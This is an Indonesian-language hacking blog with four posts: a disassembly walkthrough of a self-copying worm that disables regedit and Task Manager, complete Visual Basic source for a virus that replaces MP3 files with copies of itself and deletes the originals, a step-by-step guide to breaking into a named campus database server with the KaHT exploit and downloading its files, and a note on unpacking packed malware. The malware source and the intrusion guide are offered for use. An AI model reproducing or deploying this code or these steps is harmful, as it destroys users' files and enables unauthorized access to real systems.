00401548 |. 8B2D 24604000 MOV EBP,DWORD PTR DS:[<&KERNEL32.SetFile>; kernel32.SetFileAttributesA
0040154E |. 894424 10 MOV DWORD PTR SS:[ESP+10],EAX

BARIS PENGGANDAAN FILE

Pada baris berikut virus melakukan penggandaan file yang ada di tiap – tiap folder. Misalnya anda mempunyai folder bernama buah dan di dalam folder buah ada folder pisang, apel dan cerry. Maka di tiap – tiap folder akan ada file virus sesuai nama foldernya, jadi di folder buah ada file bernama buah.exe, di folder pisang ada file virus bernama pisang.exe dan di folder apel dan cerry ada file bernama apel.exe dan cerry.exe…

00401710 |. 68 4C714000 PUSH Flashyun.0040714C ; ASCII "\%s.exe"
00401715 |. 52 PUSH EDX
00401716 |. E8 13030000 CALL Flashyun.00401A2E
0040171B |. 8DBC24 1C01000>LEA EDI,DWORD PTR SS:[ESP+11C]
00401722 |. 83C9 FF OR ECX,FFFFFFFF
00401725 |. 33C0 XOR EAX,EAX
00401727 |. 83C4 0C ADD ESP,0C
0040172A |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040172C |. F7D1 NOT ECX
0040172E |. 2BF9 SUB EDI,ECX
00401730 |. 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C]
00401734 |. 8BF7 MOV ESI,EDI
00401736 |. 8BD9 MOV EBX,ECX
00401738 |. 8BFA MOV EDI,EDX
0040173A |. 83C9 FF OR ECX,FFFFFFFF
0040173D |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040173F |. 8BCB MOV ECX,EBX
00401741 |. 4F DEC EDI
00401742 |. C1E9 02 SHR ECX,2
00401745 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00401747 |. 8BCB MOV ECX,EBX
00401749 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
0040174D |. 83E1 03 AND ECX,3
00401750 |. 6A 01 PUSH 1 ; /FailIfExists = TRUE
00401752 |. 50 PUSH EAX ; |NewFileName
00401753 |. 68 207B4000 PUSH Flashyun.00407B20 ; |ExistingFileName = ""
00401758 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
0040175A |. FF15 2C604000 CALL DWORD PTR DS:[<&KERNEL32.CopyFileA>>; \CopyFileA
00401760 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
00401764 |. 6A 01 PUSH 1 ; /FileAttributes = READONLY
00401766 |. 51 PUSH ECX ; |FileName
00401767 |. FF15 24604000 CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA

BARIS KODE PERTAHANAN

Nah virus menjalankan baris pertahanan dengan cara menulisi registry windows di alamat tertentu, misalnya pada baris berikut, virus akan menulis di registry windows pada alamat :

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr

Yang berguna untuk mengunci regedit dan ctrl+alt+del

0040181A . 68 5C724000 PUSH Flashyun.0040725C ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System"
0040181F . 68 01000080 PUSH 80000001
00401824 . FFD7 CALL EDI
00401826 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
0040182A . 6A 04 PUSH 4
0040182C . 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
00401830 . 51 PUSH ECX
00401831 . 6A 04 PUSH 4
00401833 . 6A 00 PUSH 0
00401835 . 68 44724000 PUSH Flashyun.00407244 ; ASCII "DisableRegistryTools"
0040183A . 52 PUSH EDX
0040183B . FFD6 CALL ESI
0040183D . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00401841 . 6A 04 PUSH 4
00401843 . 8B4C24 14 MOV ECX,DWORD PTR SS:[ESP+14]
00401847 . 50 PUSH EAX
00401848 . 6A 04 PUSH 4
0040184A . 6A 00 PUSH 0
0040184C . 68 34724000 PUSH Flashyun.00407234 ; ASCII "DisableTaskMgr"

Dan untuk menyembunyikan folder option virus menjalankan atau menulisi registry windows di alamat:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions

00401867 . 68 F8714000 PUSH Flashyun.004071F8 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
0040186C . 68 01000080 PUSH 80000001
00401871 . FFD7 CALL EDI
00401873 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
00401877 . 6A 04 PUSH 4
00401879 . 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
0040187D . 51 PUSH ECX
0040187E . 6A 04 PUSH 4
00401880 . 6A 00 PUSH 0
00401882 . 68 E8714000 PUSH Flashyun.004071E8 ; ASCII "NoFolderOptions"

Untuk menyembunyikan ekstensi file dan menyembunyikan file beratribut hidden yang ada di registry windows dan alamat:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced, HidefileExt
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced, Hidden

Virus menjalankan kode baris berikut ini:

0040189D . 68 AC714000 PUSH Flashyun.004071AC ; ASCII "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
004018A2 . 68 01000080 PUSH 80000001
004018A7 . FFD7 CALL EDI
004018A9 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
004018AD . 6A 04 PUSH 4
004018AF . 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
004018B3 . 52 PUSH EDX
004018B4 . 6A 04 PUSH 4
004018B6 . 6A 00 PUSH 0
004018B8 . 68 A0714000 PUSH Flashyun.004071A0 ; ASCII "HideFileExt"
004018BD . 50 PUSH EAX
004018BE . FFD6 CALL ESI
004018C0 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
004018C4 . 6A 04 PUSH 4
004018C6 . 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
004018CA . 51 PUSH ECX
004018CB . 6A 04 PUSH 4
004018CD . 6A 00 PUSH 0
004018CF . 68 98714000 PUSH Flashyun.00407198 ; ASCII "Hidden"
Sedangkan untuk melakukan sharing direktori windows yang terbuka pada alamat registry:

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess, Start

Virus menjalankan script dibawah ini:

004018FA . 68 68714000 PUSH Flashyun.00407168 ; ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess"
004018FF . 68 02000080 PUSH 80000002
00401904 . FFD7 CALL EDI
00401906 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
0040190A . 6A 04 PUSH 4
0040190C . 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
00401910 . 52 PUSH EDX
00401911 . 6A 04 PUSH 4
00401913 . 6A 00 PUSH 0
00401915 . 68 60714000 PUSH Flashyun.00407160 ; ASCII "Start"
(c) virologi
Posted on 00.11 by aZi and filed under | 0 Comments »

.mp3 Virus

Option Explicit
'///////////////Penangkap Hardisk/////////////////////////
Private Declare Function GetDriveType Lib "kernel32" _
Alias "GetDriveTypeA" (ByVal nDrive As String) As Long

Private sDrives() As String
'/////////////////////////////////////////////////////////

'///////////////Deklarasi Penangkap File//////////////////
Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_SYSTEM = &H4
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Const FILE_ATTRIBUTE_COMPRESSED = &H800
Private Const MAX_PATH = 260

Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type

Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type


Private Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" _
(ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long

Private Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" _
(ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long

Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long

Private Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long

Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long


Private pbMessage As Boolean
'/////////////////////////////////////////////////////////

'////////////////Deklarasi copy ke windows///////////////
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
'///////////////////////////////////////////////////////

'////////////////Deklarasi copy ke windows///////////////
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
'///////////////////////////////////////////////////////

'///////////////////////Sub Perangkap Hardisk/////////////
Sub cari()
Dim ictr As Integer

'If InStr(cboDrives.Text, "All Hard Drives") > 0 Then
For ictr = 0 To UBound(sDrives)
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
GetFiles sDrives(ictr), True, "*.mp3"
Next
'Else
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
' frmMain.GetFiles cboDrives.Text, True, "*.doc"
'End If

' frmMain.Visible = True



End Sub

Sub hardisk()
Dim ictr As Integer
Dim iDriveCount As Integer
Dim sAllDrives As String
Dim sDrive As String
ReDim sDrives(0) As String

For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If DriveType(sDrive) = "Fixed Drive" Or DriveType(sDrive) = "Removable Drive" Then
If sAllDrives <> "" Then sAllDrives = sAllDrives & ", "
sAllDrives = sAllDrives & sDrive
iDriveCount = iDriveCount + 1
End If
Next

'If iDriveCount > 1 Then
' sAllDrives = "All Hard Drives (" & sAllDrives & ")"
' cboDrives.AddItem sAllDrives
'End If

'cboDrives.ListIndex = 0
'EnableSearch



End Sub

Private Function DriveType(Drive As String) As String

Dim sAns As String, lAns As Long

'fix bad parameter values
If Len(Drive) = 1 Then Drive = Drive & ":\"
If Len(Drive) = 2 And Right$(Drive, 1) = ":" _
Then Drive = Drive & "\"

lAns = GetDriveType(Drive)
Select Case lAns
Case 2
sAns = "Removable Drive"
Case 3
sAns = "Fixed Drive"
Case 4
sAns = "Remote Drive"
Case 5
sAns = "CD-ROM"
Case 6
sAns = "RAM Disk"
Case Else
sAns = "Drive Doesn't Exist"
End Select

DriveType = sAns

End Function
'//////////////////////////////////////////////////////////////////////

'//////////////////////////////Sub perangkap File/////////////////////
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = "*.*")

'Screen.MousePointer = vbHourglass

'Dim li As ListItem
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
Dim bawa As Long

fPath = AddBackslash(Path)

Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern


hFile = FindFirstFile(fName, WFD)

On Error Resume Next
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If

If hFile > 0 Then
While FindNextFile(hFile, WFD)
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
Wend
End If

If SubFolder Then


hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then

GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If

While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then


GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend

End If
FindClose hFile
'Set li = Nothing



'Screen.MousePointer = vbDefault

End Sub


Private Function StripNulls(f As String) As String

StripNulls = Left$(f, InStr(1, f, Chr$(0)) - 1)
End Function

Private Function AddBackslash(S As String) As String

If Len(S) Then
If Right$(S, 1) <> "\" Then
AddBackslash = S & "\"
Else
AddBackslash = S
End If
Else
AddBackslash = "\"
End If
End Function

'////////////////////////////////////////////////////////////////////

Private Sub kopikewindows()
''////mengkopi file virus atau penanda ke directory windows
Dim buffer As String * 255
Dim x As Long

x = GetWindowsDirectory(buffer, 255)
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Left(buffer, x) & "\winamp.dll.exe"
End Sub

'//////////////////Kode Pertahanan////////
Public Sub CreateKey(Folder As String, Value As String)

Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value

End Sub

Public Sub CreateIntegerKey(Folder As String, Value As Integer)

Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"

End Sub
'/////////////////////////////////////////

'//////////////////MAIN///////////////////
Sub Main()
Dim titik As String
titik = """"

CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ServiceOptionMP3", _
titik & "c:\windows\winamp.dll.exe" & titik
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", "STOP PIRACY!!!!"
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!"
Shell "taskkill /f /im winamp.exe", vbHide
hardisk
cari
kopikewindows
End Sub
'/////////////////////////////////////////
Posted on 23.51 by aZi and filed under | 0 Comments »

Hajar Database Server

Okeh persiapannya gampang kok…, tinggal mengenali apakah di sana maksudnya di kampus ada hotspot ato tidak … kalo ada ya tinggal menyiapkan tools yang harus di bawa..

1. Laptop .. jelas laptop lah wajib … jika di universitas ada hotspot nah itu sasaran empuk untuk di kerjai …
2. Persiapan kedua harus mengenali server di sana … maksudnya server tersebut memakai jenis apa aja sih??? Jika memakai windows ya gunakan atau kumpulkan exploit windows di laptop anda, kalau pakai linux ya siapkan exploit linux di laptop anda.
3. Nah selanjutnya adalah kendaraan untuk ke kampus … untuk menjemput hotspot di sana …
4. Softwarer yang digunakan :
a. AngryIPscanner
b. Kaht
c. DOS (Diskette Operating System)

PROSES PENYUSUPAN

OKE INI bagian yang ditunggu tunggu kan ….. pertama cari aja hotspot mo di perpus atau di lobby, mending cari aja tempat sepi …

Bagaimana cara mengetahui IP Adress? Gampang …coba lihat di kanan bawah windows … ada kan gambar icon yang tersambung ke hotspot server … nah klik 2 kali aja:



Na kliatan kan kita telah masuk kek jaringan hotspot nya … soalnya server memakai metode DHCP, istilahnya sambung langsung, jadi kita mendapat IP address langsung:

IP Address : 192.168.4.173 (ip address kita)
Subnet : 255.255.255.0
Default Gateway : 192.168.4.1 ( nah ini adalah server gatewaynya atau istilahnya wireless server nya lah)

Nah kalau sudah kemudian gunakan AngryIPScanner untuk memetakan jaringan yang di sana … seperti pada gambar :



wow wow wow ternyata banyak yah server yang idup…. , pertama kita tentukan aja IP address yang discan … misalnya 192.168.1.0 sampai 192.168.1.255. Di situ terlihat kan ada komputer dosen – dosen dan server YKPN itu sendiri …. Ck ck ck …kenapa harus memakai orang dalem … orang luar aja bisa kok mengubah nya sendiri … oke … kita pilih yang ada kata2 servernya SERVERBOX dengan IP adress 192.168.1.237 yah gambling ajah dulu ….

Setelah itu coba pakai exploit KaHT, apa itu KaHT, baca aja sendiri … banyak di google okeh … cari ajah…:



Untuk menjalankan KaHT harus masuk ke DOS mode dulu, kemudian jalankan KaHT.exe nah setelah itu … akan muncul gambar seperti di atas… untuk sintaks penulisan KaHT adalah :

KaHT IP address1 [spasi] ipaddress2

Contoh penulisan untuk bisa masuk ke database YKPN:

KaHT 192.168.17.235 192.168.17.237

Nah setelah ketik sintaks di atas, tekan enter :




BANG BANG BANG!!!! Mati ………… kita sudah dapat masuk ke host SERVERBOX, nah coba kita melihat2 isi dalamnya yak … ada apa di sana:



suit suit……… apa tuh perpustakaan.mdb,… kliatannya file database tuh …. Silakan aja donlot … coba ke direktori lainnya :



Hmmm…. Coba liat di gambar …. Wauw akademik-info.adp ukurannya gigabyte … hmmm… silahkan aja lah … teserah mo diapain …

For admin please patch your system … mungkin serverbox hanya sekedar infocenter … tapi dengan cara seperti ini kemungkinan serverppmb atau yang lainnya dapat dimasuki oleh yang lain …

Maaf kalau sedikit agak radikal …. Ya bukan mau menunjukkan gigi, tapi hanya membongkar fakta sebenarnya aja … semoga dapat diambil hikmah positif-nya dari artikel ini .. jadi jangan diambil negatif nya yah … tolong tolong … di atas langit masi ada langit … saya bukan yang ter expert dalam hal ini … masi ada yang lebih jago kok … thanks ….
(c) virologi
Posted on 00.04 by aZi and filed under | 0 Comments »

Crack Virus Packing

COMPILER
Compiler? what is it? compiler adalah proses untuk merubah dari source code virus menjadi file .exe. Yaaa.....misalnya kalau kita membuat virus dari Visual Basic, berarti compilernya Visual Basic, Kalau kita membuat virus dari Delphi, berarti compilernya delphi atau kita membuat virus dari Assembler compilernya juga TASM....jadi masing2 virus mempunyai compiler yang berbeda2, tergantung dari mana dia dibuat....

PACKING
Packing (seperti yang dijelaskan di buku saya) wueleh...promosi lagi :-p adalah proses untuk mengemas virus....maksudnya???ya sama kalau kita membuat kue atau barang...pasti kudu dikemas dulu kan...agar tampil apik dan rapi....nah pengemasan itu biasanya memakai UPX, Aspack atau teLock...nah gunanya packing agar virus kita tidak ketauan dibuat memakai apa...atau dengan kata lain untuk menyembunyikan compiler virus tersebut. Compiler harus disembunyikan...gar user tidak mengetahui source code nyak...


PROSES CRACKING COMPILER DAN PACKING
Proses crackingnya sangat mudah sekali...cukup donlot yang namanya RDG Packer Detector v0.6.3 Beta, dan ikuti langkah di bawah ini:

1. donlot RDG Packer Detector v0.6.3 Beta di
http://www.rdgsoft.8k.com/RDG%20Packer%20Detector.htm

2. kemudian jalankan program RDG Packer Detector v0.6.3, seperti gambar di bawah ini:




3. kemudian klik open untuk memilih file yang akan di garap, misalnya saya punya file p3kdiary.exe yang di compile dengan vb dan di packing dengan UPX. Maka tinggal klik open dan pilih file yang disuka....sampai ada keterangan seperti ini di gambar ini :



naaaaaa.....kalo udah ada keterangan seperti ini berarti :

memakai Visual Basic
memakai UPX v0.80
dan heuristic atau enkripsi dan pengacakannya memakai UPX

nah kalau sudah kita kan udah tau compiler dan packernya...tinggal mencara UPX unlock dan tools Exe to VB untuk membongkar source code program.....

nah sekarang tugas anda...okeh...

untuk mencari tools unlock UPX and reverse engineering to VB nyah....okeh
(c) virologi
Posted on 23.54 by aZi and filed under | 0 Comments »